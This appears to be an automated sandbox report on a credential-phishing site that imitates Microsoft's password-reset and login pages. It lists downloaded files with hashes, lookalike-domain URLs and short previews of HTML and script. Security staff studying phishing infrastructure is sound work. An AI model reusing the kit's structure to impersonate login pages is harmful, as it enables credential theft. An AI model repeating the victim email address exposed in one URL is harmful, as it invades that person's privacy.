                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=VOVMn-1ji7ptewpNKKe04Ptic_v4sQOkJoNbFSKTCgnJsUDWSYIRw2xt1tvPsTxUYZhIRTaUX9U_dbj8uphXZ0fSg0RHKflqXhImoGV7W_at39wE7F7NNSnjODDdnBpjRydn5povagbPAE8o6JMPhrtPc-X0tGWW1sDlhdiAl_QNQ2pOijcJ10WZjkyvuUaxYB0v6dTbanr2kY0nL-clTw2&t=ffffffffa8ad04d3
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 24 x 24
                                          Category:downloaded
                                          Size (bytes):2463
                                          Entropy (8bit):6.994052150121201
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:93DE6FB07C1382459E473381DA5D0E7E
                                          SHA1:4E1208D482A7ABA8C86FDCF8E0E92C90BB8C8C8A
                                          SHA-256:E97FA0CFE4B0A7BB22E9713A67D4667DA064E674A944D607E78F0D3BF48E57A5
                                          SHA-512:B415DE10B55639DD5DFDD038FD490B675059122373659DD86AA00EBC7F6735FD22360264226F8675741FB76F3B3A16E9AB7FA907F489B377EF16E9222AA26E3B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/images/wait_animation.gif
                                          Preview:GIF89a.............!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:BCB95722648AE111A86BB806ED51E581" xmpMM:DocumentID="xmp.did:185F1A028B0511E19AA1A07B5BDC793D" xmpMM:InstanceID="xmp.iid:185F1A018B0511E19AA1A07B5BDC793D" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:D7EC7F987A8AE111A86BB806ED51E581" stRef:documentID="xmp.did:BCB95722648AE111A86BB806ED51E581"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......................................................................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 223956
                                          Category:downloaded
                                          Size (bytes):54457
                                          Entropy (8bit):7.9959068048468795
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:0B41F191B4963050D49A6DEE019B83F7
                                          SHA1:3047FEC81163505529FF0F4B0A37C23BE7EBD393
                                          SHA-256:6BA548B1B98F2165617ED806ED2F114A386D070C228E2200640835BA0F32FE8E
                                          SHA-512:0F16F29906C95D45689626114BAF8B2536E4E1337CF74F7D2226998729AC8ED271538DD15C72CCB6A414BFA9457B4CAEE391788078DFEA8FD9E1DAF97BF8994C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_8e14dcf0e3ff5580d170.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 89 x 18, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):1805
                                          Entropy (8bit):7.265265285391204
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:BC89C1FBFBC227DC5A7ED9B2797E240D
                                          SHA1:8A9390297FDD0963C466CF2FD35D5B1F88A46B6A
                                          SHA-256:744A8CD0A4D15DFCF4A5D2E832FF556D950F8AF24D7B66104AB2EF4FE2605D9A
                                          SHA-512:C18F6B22F4AC5040E3FEBE8034AD3A3A3EF32CF3384BE6C3144B2EB04080F03111743D5B30AF3A1343AFD68A20AAE5972422C724107243D00CD9CF263DDC10C7
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...Y.........0.r.....sRGB.........gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:BABFACAF901511E2BD4FDE5C526470CF" xmpMM:DocumentID="xmp.did:BABFACB0901511E2BD4FDE5C526470CF"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:BABFACAD901511E2BD4FDE5C526470CF" stRef:documentID="xmp.did:BABFACAE901511E2BD4FDE5C526470CF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..R....fIDATXG.mq[1.E.!...3&...P.................3..~L..q.O..t..{...v?..n.....b#.-.i..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 352 x 3
                                          Category:dropped
                                          Size (bytes):3620
                                          Entropy (8bit):6.867828878374734
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:B540A8E518037192E32C4FE58BF2DBAB
                                          SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                          SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                          SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 447145
                                          Category:downloaded
                                          Size (bytes):121788
                                          Entropy (8bit):7.997540192258147
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:9C7CDA2A727581CD990D80998F3836A1
                                          SHA1:A8CD25856E11F7DB671DD8E037D55B57222232FE
                                          SHA-256:01D3F7C5A2EBE2E95D49638D41CAC413A2AD42384540096F9A5AEF88240776E3
                                          SHA-512:1900F665B848C6EAFAECD7116745D2A883E8735E2710515E184050815609EEA08BFAED97DDB473A2E5C373B77E29159E1BF9B1D348FCAE125F542E700CC4ABFC
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/ConvergedLogin_PCore_Kjlmc42uL0ATl_21eYcwVg2.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 141535
                                          Category:downloaded
                                          Size (bytes):49781
                                          Entropy (8bit):7.994898479812402
                                          Encrypted:true
                                          SSDEEP:
                                          MD5:1F47654B448FF1C7BE0450BD4E5B6AD2
                                          SHA1:1BF579482CDFA80BAA7FBB19780EB88A0D7FC22D
                                          SHA-256:04AB3367C7AD4781D352D96685CDFB2A98044B1559AFB353B8783BB8CD935074
                                          SHA-512:726F7F71C45D76B2E11BC100D6BA4BBD4377F79CD04B8E1852E402E193FDBAD5340F5C55CB137601E9E7D49DDFEE227C24AF367F69948C4CE25AC29D56D56456
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/BssoInterrupt_Core_sw-M8KkV3_nBot-G1ImRcw2.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 40329
                                          Category:downloaded
                                          Size (bytes):9984
                                          Entropy (8bit):7.979200972475404
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:1F2EFD65E8F5FAB8BDB4C5C58B5266CD
                                          SHA1:DC0CF6C1245542368256F2BC455834F2BD2D82C2
                                          SHA-256:B5ACEFB479F59D7954C3BD57DD769C4D489248C846186B7CBC3FDED601C3FD95
                                          SHA-512:EBFECF2564AC3C0983578C8F59778D5E1AD21D1443BCAE14346E5DB1240990602CFFB92EC2FD8BF67933598DF5B8768EE4349BDAB7073A9FD7C8A7BD7A1DC91C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=T0dtiwsjKq8gW-fIsAHJyvGnpZPh0iXezm0u3NfytbZ6-6TsiMM-tLKg1veJyjBNY_R3eWGKT7hbAEM4dL48sjZhOiEgfu5nu9KBaaEColWX9lEPD8FaiJMJS9w3E0b_PCJJB-U0Q-uXF00jBspnQFP7Izh7xg73UEYI_OsFKGUjtvZWehapPNjhxxovc4Gqlv_ui3xC40LE2RSikyfhYXQGc5YVZsDGR9yE_8mcw2o1&t=74258c30
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 55503
                                          Category:downloaded
                                          Size (bytes):15942
                                          Entropy (8bit):7.985848663515711
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E488D353476FAC6C93E6056EDF1B04E2
                                          SHA1:69BFEF9AAFE0F7543ED36FB26F558C769EF97BEF
                                          SHA-256:EB3C57E120B75B045A09F177C61420DD4BF785613185D253C0D8F53DC6474CE3
                                          SHA-512:A805573E08E5F4D0D5088D15916E3BDA54036700E875F249541CB1CF9F26172B0ECD6D20E71625CDDF275F9D8270DC4DC6443C4884AEA71DE50C0FC6098DA716
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_fo8rkc18qnhjh4wnzabsdg2.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 113355
                                          Category:downloaded
                                          Size (bytes):20390
                                          Entropy (8bit):7.979439840390925
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:02363E4C20BE02F305298C569681427C
                                          SHA1:EEEF3294F36805907EC217BE82022A71350AA7F5
                                          SHA-256:DE0591B9220B931A57F173CE64D7E14F041B979CA5BEC6127B4BCEC7C373AD1C
                                          SHA-512:7AD5AB34536709F0AA0C7FEDABF6432A6EB2F5D201BC71AA34E236E230D9FDF7C01EAE3A1800DE9F9AF01521B881478F259BE1574755C4FC17B8090E237BE9DA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ests/2.1/content/cdnbundles/converged.v2.login.min_mc5ac6ol0l4d2iaqspstyg2.css
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):23063
                                          Entropy (8bit):4.7535440881548165
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:90EA7274F19755002360945D54C2A0D7
                                          SHA1:647B5D8BF7D119A2C97895363A07A0C6EB8CD284
                                          SHA-256:40732E9DCFA704CF615E4691BB07AECFD1CC5E063220A46E4A7FF6560C77F5DB
                                          SHA-512:7474667800FF52A0031029CC338F81E1586F237EB07A49183008C8EC44A8F67B37E5E896573F089A50283DF96A1C8F185E53D667741331B647894532669E2C07
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/WebResource.axd?d=PZp-UguzV3eiIgC9jthUzRVid1Zp7Yrh6GnWr6UFT7HZeGKMaINHyYeiOoYl901XG1SgokATq5Nqn3NEpiSXniqMwkj7V_kjzBmM_w8PfSJW9srpOcEZZbp1FPwrN8XzdR0AFY0bHhANU64v3ZJk5Q2&t=638533173304620628
                                          Preview:function WebForm_PostBackOptions(eventTarget, eventArgument, validation, validationGroup, actionUrl, trackFocus, clientSubmit) {.. this.eventTarget = eventTarget;.. this.eventArgument = eventArgument;.. this.validation = validation;.. this.validationGroup = validationGroup;.. this.actionUrl = actionUrl;.. this.trackFocus = trackFocus;.. this.clientSubmit = clientSubmit;..}..function WebForm_DoPostBackWithOptions(options) {.. var validationResult = true;.. if (options.validation) {.. if (typeof(Page_ClientValidate) == 'function') {.. validationResult = Page_ClientValidate(options.validationGroup);.. }.. }.. if (validationResult) {.. if ((typeof(options.actionUrl) != "undefined") && (options.actionUrl != null) && (options.actionUrl.length > 0)) {.. theForm.action = options.actionUrl;.. }.. if (options.trackFocus) {.. var lastFocus = theForm.elements["__LASTFOCUS"];.. if ((typeo
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):51996
                                          Entropy (8bit):4.678808903961564
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F95520B36E5DCF0FCC3A202EF755B4E6
                                          SHA1:BD76BCEF3046599348372DF0C0882CEC7097999E
                                          SHA-256:60792654629471644E38A1D7DA760E9736CFCD6AB0AC9E99EA0801D8A467328B
                                          SHA-512:48EECFD4C51F4095BD87E15108CA968EFF484906075148D4C985512F8B4BD8FDA6A5DA80C9A4F5D0BF7C10B497F421DBF2178E8D96C66906487808F099B05846
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.com
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascript
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 7042
                                          Category:downloaded
                                          Size (bytes):2445
                                          Entropy (8bit):7.923098628075793
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:37AED21D2C2C95A2F4586765375A96AB
                                          SHA1:CE7470E279718C15C35C29E504FA409D0D1B0E8A
                                          SHA-256:A19BFF0BF413D5902773E2936994EE130DCA83F6DDA0CE04012420C202590BE8
                                          SHA-512:A74F38ED2D579EDB2799A3E90B99C1E82608B890E47C4C0B72287D339CFA4076AA05C05E86C5A91DB7A26868A8275D7BD24EC846450482F66EC8EBE9499DCDD7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_pidpdisambiguation_9bde48b6fee57b337cea.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1525
                                          Entropy (8bit):4.80220321270831
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:ACA0F1B02DC406E76DDC5F2BDEBEC6CE
                                          SHA1:594C930BE86B8843377565E349D2A10F1755A13A
                                          SHA-256:0446C6FD9AEB7DCD7CC089FA25323B1AE9AFA77B4CF8D4449F7D2D1B2467393A
                                          SHA-512:06887860F73D38799FFF8BF5B2972160B68C303EC904813861190E9A8A6477E4D300882994D661FDFC118C408625C537D8B28287DC9941D50302BD91C88ED98F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/js/Common.js
                                          Preview:.....function GetCookieValue(cookieName)..{.. if (document.cookie == undefined || document.cookie == "").. return "";.... var name = cookieName + "=";.. var cookieArray = document.cookie.split(';');.. for (var i = 0; i < cookieArray.length; i++).. {.. var clientCookie = cookieArray[i].trim();.. if (clientCookie.indexOf(name) == 0).. {.. return clientCookie.substring(name.length, clientCookie.length);.. }.. }.. return "";..}....function DeleteCookie(name)..{.. if (GetCookieValue(name).length > 0).. {.. document.cookie = name + "=" + ";expires=Thu, 01 Jan 2000 00:00:01 GMT";.. }..}....function GetUserSessionData(key) {.. var sessionStorage = window.sessionStorage;.. if (sessionStorage[key] == null) {.. return "";.. }.. return sessionStorage.getItem(key);..}....function SetUserSessionData(key, value) {.. var sessionStorage = window.sessionStorage;.. sessionStorage.setItem(key, val
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 16 x 25, 8-bit/color RGBA, non-interlaced
                                          Category:dropped
                                          Size (bytes):405
                                          Entropy (8bit):6.927238031773719
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:D4FFE61373F6AA32EEB8CA7CD41AB980
                                          SHA1:4925FAC4BC73EFB7C7BBC32B11C435ECF1D61674
                                          SHA-256:D5C54FFC6B8BD44D932BE8F37B1CD5B666205C7574F9D56EF68E56F83E08FFAD
                                          SHA-512:0F7EDE96F20BB3C053C246FFE1EF8CE739CEF7757FAAED031A365299B88664A046557C2C7FDB3BADED070BA4EBA1A14950D7E3A066B4976BF07142CEFA48BEEB
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 513
                                          Category:dropped
                                          Size (bytes):276
                                          Entropy (8bit):7.319344972980597
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:44D8807C223B5C6DEF6E75A602F314EF
                                          SHA1:E061C196D771661D6C47336C50EAFE2B3BA14130
                                          SHA-256:BA9816D7AF3E3B0EA5B6B34BAA0C99FE5EDCF4CA9BE30307AAA2956F994A8B1E
                                          SHA-512:E71B16643B2AC3DC315D1EEF21B9054A71F35E9E2E1DC0D36ABC08F4BDF1A9D3C3D6E9D35D06217966647367DCDD7709EA92B558CE407422FC13B4C33E12E3E4
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 1864
                                          Category:dropped
                                          Size (bytes):673
                                          Entropy (8bit):7.6584200238076905
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2D2CBA7D7DC75F3BA9DC756738D41A6E
                                          SHA1:F87FD26066ED5E52A65DEE0ED2D581D3C3EA15AC
                                          SHA-256:00E21864CF1BC70302EBB5B496C6C471A7DA8CBF600630B478A3E2376ED20EA2
                                          SHA-512:46F17658CA247C02F612213025350390D8F62179C8DE26725EB17F5CCFAFDD63F2149DA1765D3C2F3A12FE85EF29CAC58457B0D5C2F8DA8DED6E1231A35F199D
                                          Malicious:false
                                          Reputation:unknown
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 102845
                                          Category:downloaded
                                          Size (bytes):25653
                                          Entropy (8bit):7.988599483516265
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:F0CE56431957B4C65471B640FFB5EE36
                                          SHA1:13CD0BC4A060FCDBDF12E60FFE3CDFAFC9A31367
                                          SHA-256:9224E3CC201F01A5C9F2BD82F4653897BCE931ECF4DD74B5A0134D7EC6C0BD73
                                          SHA-512:96AD01A07C31DA43830A3B9D4EA9908B1C72D84209513EEFBE6E6907406E8FFC071098D095739447BBFF12A63851C91301640F8DEBFB352E2FD17AF63513FAA2
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ScriptResource.axd?d=QLrP6mIJ7ueSGHO76v9yfTImQUOtYCoOjHacorzH5TLKOrh9q9RxJn4yT2gwt-5hCto2xKcJLNcreE4qet4Lh8rEpzV0U1CdXTgP1HQS6sdYdfc3vDJz_AHQWhudWnHugQouXXFhySP7eLg7L_3MN7WQWeyz2NjjwVkoZ_qPHIuVWaKEoOm3CQ7ncbyZM4_YTXDCK8GCLjftpLcukJlboowfkGtZtJ8Ej00GYvDVARg1&t=74258c30
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51996
                                          Entropy (8bit):4.679826725884972
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CF944604631F649ED9E95FCDD0D4460C
                                          SHA1:C5AF5FD0582628A6E2D926AF6D3D2516FB44B31C
                                          SHA-256:C8833A023341DAAC282DAF8C40850730D02EF836677E72387DF15D8133618691
                                          SHA-512:B57D8F7F3BC8E5AAB75B750B9093C01876D3506C3229B0AB2F604FADB8BDFFB3959FACE32E3C066D6037C0AB518E19AEE764CD7A05DAD1C29146F0D614F2669F
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascript
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, original size modulo 2^32 3651
                                          Category:downloaded
                                          Size (bytes):1435
                                          Entropy (8bit):7.860223690068481
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:DF6A7721C242813411CC6950DF40F9B3
                                          SHA1:B2068C4A65C183AAD6FC22A44CC1FA449CD355B4
                                          SHA-256:AA53B6DC744357B392FC57C34E516BAE465D4A6837775C137A176D599C8EA948
                                          SHA-512:CDCFB686649F2061FE13A58841EB6A4E17F40951BA0C440C568B248E6128B6E0C4E79F95DC3EAB81286C103ED2A966F7058D22066466ADED482BF9ECAA6EA3CB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):3005
                                          Entropy (8bit):4.3348196756520005
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:A870B45AC5D6B0D4E18C4829C7B660B4
                                          SHA1:2D3CA0E1F19EFDEB9B2DD3DCFFB17F8ABA118AA0
                                          SHA-256:144524233F795D6A425B76F7AE5C0BB622B5F67E2E6AE73532AD526528CA07CF
                                          SHA-512:295A21307D452F4BF51C62770C6A6B43CDB8B5A6BFA3617E068C8550285252B88F8BBF93A81C39E4BD7F73645EE094EDE0E2733DAFA5094E3EBAE20033363270
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/WebResource.axd?d=YNhUFlNXinz8LgHwbL24RQH-ZbXxyvcr7OOnguhxng8ZuiFTPNJ9QXh8dtoptfX3BeFWG9A9Hk63eLbtbIxk0HvJhkP2FoYJavizwe94hutTawufYPfHJsHAawGlkTxEe6yX2kZBiYdQxI60gLHN2g2&t=638533173304620628
                                          Preview:function WebForm_FindFirstFocusableChild(control) {.. if (!control || !(control.tagName)) {.. return null;.. }.. var tagName = control.tagName.toLowerCase();.. if (tagName == "undefined") {.. return null;.. }.. var children = control.childNodes;.. if (children) {.. for (var i = 0; i < children.length; i++) {.. try {.. if (WebForm_CanFocus(children[i])) {.. return children[i];.. }.. else {.. var focused = WebForm_FindFirstFocusableChild(children[i]);.. if (WebForm_CanFocus(focused)) {.. return focused;.. }.. }.. } catch (e) {.. }.. }.. }.. return null;..}..function WebForm_AutoFocus(focusId) {.. var targetControl;.. if (__nonMSDOMBrowser) {.. targetControl = document.getElementById(focusId);.. }.. else {.. targetContro
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 26702
                                          Category:downloaded
                                          Size (bytes):7429
                                          Entropy (8bit):7.96949164523104
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C69C9AC59264518D6B3E827DD93802A4
                                          SHA1:4B3AAB159045680EC9315A4930BEEB3DCEF6640B
                                          SHA-256:3C43CE6BD3C3EA0EE1BD1340F7D462CB7BFCE6D6E483D5F00C29A98AFD0A3A0F
                                          SHA-512:80540A3E5B4311036DD37611B040FFF4B1CD8868D75CCADF50613E8C885F676FE7395CF80B54EA665AE6A8D0024D74B5AE381F46510AC1BBDB72B59A0AA5192B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_4d39c0367444c533fcd7.js
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (941), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):51657
                                          Entropy (8bit):4.654575632629266
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E702E060D1824A9B42C0E9C596A72868
                                          SHA1:868AE017816094810089D436108993A9004D6493
                                          SHA-256:F641BB21C51BB8B911BB4CF713A6733351C20E4FF6C21032CDC93921E535972C
                                          SHA-512:9B76E3A91545E4D123D7DEB405FB7BE3EC31D61502A023DCF3A69E058804AD205F86C47F92223E794E908C9A03528FCFB75F4EACA63886C008C9D179965B238D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">..<head><title>...Microsoft Online Password Reset..</title><meta http-equiv="x-ua-compatible" content="IE=9" /><meta http-equiv="Expires" content="0" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Cache-Control" content="no-store, no-cache" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="robots" content="noindex, nofollow, NOODP, NOYDIR" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link id="FavoriteIcon" rel="Shortcut Icon" type="image/x-icon" href="../favicon.ico?v=1342177280" />.... <script src="//2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/ajax/jQuery/jquery-3.6.0.min.js" type="text/javascript"></script>.. <script type="text/javascript">window.jQuery || document.write('<script type="text/javascr
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:GIF image data, version 89a, 22 x 22
                                          Category:downloaded
                                          Size (bytes):478
                                          Entropy (8bit):7.072122642964318
                                          Encrypted:false
